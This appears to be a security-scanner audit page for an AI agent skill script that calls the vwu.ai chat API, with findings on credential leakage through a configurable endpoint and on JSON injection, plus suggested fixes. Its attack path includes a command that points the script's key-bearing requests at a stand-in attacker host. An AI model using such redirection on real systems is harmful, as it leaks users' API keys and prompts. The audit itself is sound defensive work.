Back to skill

Security audit

vwu.ai TTS Models

Security checks for vulnerabilities and agentic risk

Overview

This is a simple vwu.ai API helper, but it can send your API key and prompt to an undocumented server if an environment variable is changed.

Review before installing. Only run this in a trusted shell environment, ensure VWU_BASE_URL is unset or points to the intended HTTPS vwu.ai endpoint, and avoid sending sensitive prompts until the script validates its destination and constructs JSON with a proper serializer.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (2)

T09 · Insecure Skill Coding Practices

Error
Location
vwu-chat.sh:7
Finding

API Key and Prompt Exfiltration Through an Unvalidated Configurable Endpoint

Content
View full analysis

Vulnerability Details

File Location: vwu-chat.sh, lines 7 and 29-39
Vulnerability Type: Unvalidated API endpoint configuration leading to credential disclosure
Risk Level: High

Vulnerable Code

zsh
VWU_BASE_URL="${VWU_BASE_URL:-https://vwu.ai}"
zsh
# Call API
response=$(curl -s "$VWU_BASE_URL/v1/chat/completions" \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer $VWU_API_KEY" \
    -d "{
        \"model\": \"$MODEL\",
        \"messages\": [{\"role\": \"user\", \"content\": \"$PROMPT\"}],
        \"stream\": false
    }")

Technical Analysis

The destination receiving the bearer credential is controlled by the VWU_BASE_URL environment variable. The script does not validate the URL scheme, hostname, port, or final destination before attaching the Authorization: Bearer header.

Although the documented destination is https://vwu.ai, a parent process, compromised launcher, altered shell profile, or unsafe automation environment can set VWU_BASE_URL to an attacker-controlled server. The subsequent curl invocation will transmit both the complete API key and the user's prompt to that server.

The implementation also permits an unencrypted http:// endpoint, which could expose credentials and prompts to network interception.

Attack Path

  1. An attacker gains the ability to influence the environment used to launch the script, such as through a wrapper, shell configuration, CI configuration, or compromised parent process.
  2. The attacker sets VWU_BASE_URL to an endpoint they control:
    sh
    export VWU_BASE_URL="https://attacker.example"
    
  3. The user configures a valid VWU_API_KEY and invokes the Skill.
  4. The script sends a request to https://attacker.example/v1/chat/completions.
  5. The request contains the complete API key in its bearer authorization header and the model and prompt in its body.
  6. The attacker c ...[truncated 830 chars]
Remediation
View remediation

Remediation Suggestions

  • Remove VWU_BASE_URL configurability if this Skill is intended to communicate only with vwu.ai.
  • Otherwise, parse and validate the configured URL before sending credentials:
    • Require the https scheme.
    • Permit only an explicit allowlist of trusted hostnames.
    • Reject embedded credentials, unexpected ports, fragments, and ambiguous hostname encodings.
    • Compare a parsed hostname rather than using substring or suffix checks.
  • Do not attach an authorization header until the destination has passed validation.
  • Consider separating development endpoint overrides from production behavior and requiring an explicit command-line opt-in before credentials may be sent to a non-default endpoint.
  • Document any supported endpoint override so users understand where credentials and prompts may be transmitted.
  • Use restrictive execution environments to prevent untrusted processes or configuration files from modifying security-sensitive environment variables.

T09 · Insecure Skill Coding Practices

Warning
Location
vwu-chat.sh:20
Finding

JSON Request Injection Through Unescaped Model and Prompt Values

Content
View full analysis

Vulnerability Details

File Location: vwu-chat.sh, lines 20-21 and 29-39
Vulnerability Type: Improper construction of JSON from untrusted input
Risk Level: Medium

Vulnerable Code

zsh
MODEL="${1:-}"
PROMPT="${2:-}"
zsh
# Call API
response=$(curl -s "$VWU_BASE_URL/v1/chat/completions" \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer $VWU_API_KEY" \
    -d "{
        \"model\": \"$MODEL\",
        \"messages\": [{\"role\": \"user\", \"content\": \"$PROMPT\"}],
        \"stream\": false
    }")

Technical Analysis

The script interpolates MODEL and PROMPT directly into a JSON document without applying JSON string encoding. Shell quoting prevents these values from being interpreted as separate shell commands, but it does not make them safe JSON strings.

Inputs containing double quotes, backslashes, newlines, control characters, or crafted JSON syntax can terminate or alter the intended string values. Depending on the supplied input and the API parser's treatment of duplicate or injected fields, this can produce malformed JSON or modify the logical request structure.

This is JSON/data injection rather than shell command injection. No evidence indicates that the affected values can execute local commands.

Attack Path

  1. An attacker controls or influences a model or prompt value passed to the script, including through automation that forwards untrusted content as a command-line argument.
  2. The attacker supplies content containing a closing quote and additional JSON syntax.
  3. The script inserts that content directly into the request body without JSON escaping.
  4. The generated body is either syntactically invalid or contains attacker-influenced fields outside the intended string value.
  5. The API rejects the malformed request or interprets the modified request according to its JSON parsing and duplicate-field behavior.

For example, ...[truncated 822 chars]

Remediation
View remediation

Remediation Suggestions

Construct the request with a JSON-aware serializer rather than string interpolation. For example:

zsh
payload=$(jq -n \
    --arg model "$MODEL" \
    --arg prompt "$PROMPT" \
    '{
        model: $model,
        messages: [{role: "user", content: $prompt}],
        stream: false
    }')

response=$(curl --silent --show-error --fail-with-body \
    "$VWU_BASE_URL/v1/chat/completions" \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer $VWU_API_KEY" \
    --data-binary "$payload")

Additionally:

  • Validate MODEL against the exact supported-model allowlist in models.txt.
  • Preserve prompt text as data and never concatenate it into JSON syntax.
  • Check jq and curl exit statuses and distinguish transport failures from valid API responses.
  • Add tests covering quotes, backslashes, Unicode, tabs, carriage returns, and multiline prompts.
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The file’s user-facing instructions and examples are entirely in Chinese, which effectively forces a specific language for using the skill. The stated policy flags language or locale constraints unless the skill offers user choice or clearly documents a justified region-specific limitation.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
70% confidence
Finding

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

Content

Scanner excerpt · vwu-chat.sh (reported line 32)May include surrounding context.

sh
fi

# 调用 API
response=$(curl -s "$VWU_BASE_URL/v1/chat/completions" \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer $VWU_API_KEY" \
    -d "{

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
95% confidence
Finding

The script's comments, usage text, error messages, and remediation instructions are presented in Chinese only, including critical operational output such as authentication and quota errors. This imposes a specific language/locale on all users without offering a choice or documenting that the skill is intended only for a Chinese-speaking or region-specific audience.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.